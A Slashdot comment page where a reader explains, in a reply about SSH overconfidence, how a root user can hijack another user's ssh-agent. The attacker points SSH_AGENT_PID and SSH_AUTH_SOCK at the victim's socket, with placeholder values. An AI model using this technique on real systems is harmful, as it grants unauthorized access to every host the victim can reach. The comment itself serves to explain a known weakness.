Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror

Slashdot videos: Now with more Slashdot!

  • View

  • Discuss

  • Share

We've improved Slashdot's video section; now you can view our video interviews, product close-ups and site visits with all the usual Slashdot options to comment, share, etc. No more walled garden! It's a work in progress -- we hope you'll check it out (Learn more about the recent updates).

×

Comment: Re:Huh? What? (Score 5, Informative) 194

by Riku (#15414864) Attached to: Overconfidence in SSH Protection
Here's a summary for you:

User A on box foo:
foo> ssh-agent xterm
foo> ssh-add
  * enters their pass key *
User A can now ssh to any box that has their public key in box:$HOME/.ssh/authorized_keys

User B (evul hacker with root on box foo):
foo# SSH_AGENT_PID=XXXX; export SSH_AGENT_PID
foo# SSH_AUTH_SOCK=/tmp/ssh-YYYY/ZZZZ; export SSH_AUTH_SOCK
User B now can ssh to any box that User A can, as above.
(where XXXX, YYYY, and ZZZZ are determined by evul hacker)

Chemist who falls in acid is absorbed in work.

Working...